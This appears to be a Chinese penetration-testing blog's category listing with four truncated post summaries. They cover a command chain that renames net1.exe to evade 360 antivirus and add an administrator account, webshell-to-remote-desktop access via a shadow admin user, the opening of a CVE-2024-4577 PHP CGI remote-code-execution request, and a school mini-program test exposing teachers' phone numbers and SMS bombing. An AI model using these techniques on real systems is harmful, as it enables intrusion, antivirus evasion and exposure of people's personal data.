随笔分类 - 实战
[内网渗透]关于如何绕过360使用net命令添加账户
摘要:转自https://www.cnblogs.com/Yang34/p/14488100.html copy c:\windows\system32\net1.exe aaa.txt&& aaa.txt user y11 Aa123456@@@ /add&& aaa.txt localgroup ad
webshell转远程桌面
摘要:就在刚刚我成功的通过webshell跳到了远程桌面 下面记录一下拿下的过程 参考以下链接即可 添加用户(「渗透技巧」添加 administrator 影子用户-CSDN博客)[https://blog.csdn.net/Javachichi/article/details/129280873] 开启
[CVE-2024-4577] php CGI RCE漏洞python POC
摘要:参考:https://www.ddosi.org/cve-2024-4577/ http包👇 POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: xxx.xx
记一次对某学校的微信小程序的渗透测试(短信轰炸+教师手机号泄露)
摘要:0x01 教师手机号泄露 打开智慧校园小程序 点进教师登录后发现,输入我老师名字后会显示尾号 抓包,在response中得到完整的手机号 手机注册那里填入抓到的手机号,便可以发短信验证码(填别的手机号会被前端的验证拦截并显示'该手机号不对,清核对信息',但验证是前端的[前端就是通过该response
